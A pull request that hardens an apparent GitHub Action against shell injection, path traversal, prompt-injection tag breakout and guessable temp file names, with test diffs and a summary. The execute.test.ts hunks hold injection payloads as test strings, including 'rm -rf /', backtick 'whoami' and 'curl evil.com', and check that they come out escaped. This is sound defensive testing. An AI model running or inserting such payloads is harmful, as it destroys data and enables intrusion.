### PR TITLE
harden shell escaping, path traversal, and prompt injection defenses

### DIFF
--- a/src/main.test.ts
+++ b/src/main.test.ts
@@ -164,7 +164,7 @@ describe("main", () => {
       await run();
 
       expect(fs.writeFileSync).toHaveBeenCalledWith(
-        expect.stringMatching(/^\/runner\/tmp\/leonidas-prompt-\d+\.md$/),
+        expect.stringMatching(/^\/runner\/tmp\/leonidas-prompt-[0-9a-f-]+\.md$/),
         "prompt content",
         { encoding: "utf-8", mode: 0o600 },
       );

--- a/src/prompts/execute.test.ts
+++ b/src/prompts/execute.test.ts
@@ -460,7 +460,7 @@ Step 3: Third thing`;
       });
 
       // Verify escaping is applied
-      expect(result).toContain('bug\\"; rm -rf /,feature\\$VAR,test\\`whoami\\`');
+      expect(result).toContain('bug\\"\\; rm -rf /,feature\\$VAR,test\\`whoami\\`');
       // Verify unescaped metacharacters are not present
       expect(result).not.toMatch(/gh pr edit --add-label "bug"; rm/);
       expect(result).not.toMatch(/feature\$VAR/);
@@ -475,7 +475,7 @@ Step 3: Third thing`;
       });
 
       // Verify escaping is applied
-      expect(result).toContain('user\\"; curl evil.com; echo \\"');
+      expect(result).toContain('user\\"\\; curl evil.com\\; echo \\"');
       // Verify the command injection is prevented
       expect(result).not.toMatch(/gh pr edit --add-assignee "user"; curl/);
     });


### PR DESCRIPTION
## Summary

- **Shell escaping**: Add 8 missing metacharacters (`;`, `|`, `&`, `(`, `)`, `<`, `>`, `#`) to `escapeForShellArg()` to prevent command injection via issue labels/author fields
- **Path traversal**: Add `ensureSafePath()` function validating `config_path`, `system_prompt_path`, `rules_path` inputs stay within workspace directory
- **Prompt injection**: Add cross-tag delimiter escaping so `wrapUserContent` also escapes `<repository-configuration>` tags and vice versa, preventing trust zone breakout
- **Temp file predictability**: Replace `Date.now()` with `crypto.randomUUID()` for non-guessable temp filenames
- **Config-derived path validation**: Validate `rules_path` from config file (not just action inputs) before loading

## Test plan

- [x] 49 sanitize tests pass (8 new metacharacter tests, 7 ensureSafePath tests, 2 cross-tag tests)
- [x] All 443 tests pass
- [x] Lint + typecheck + build all pass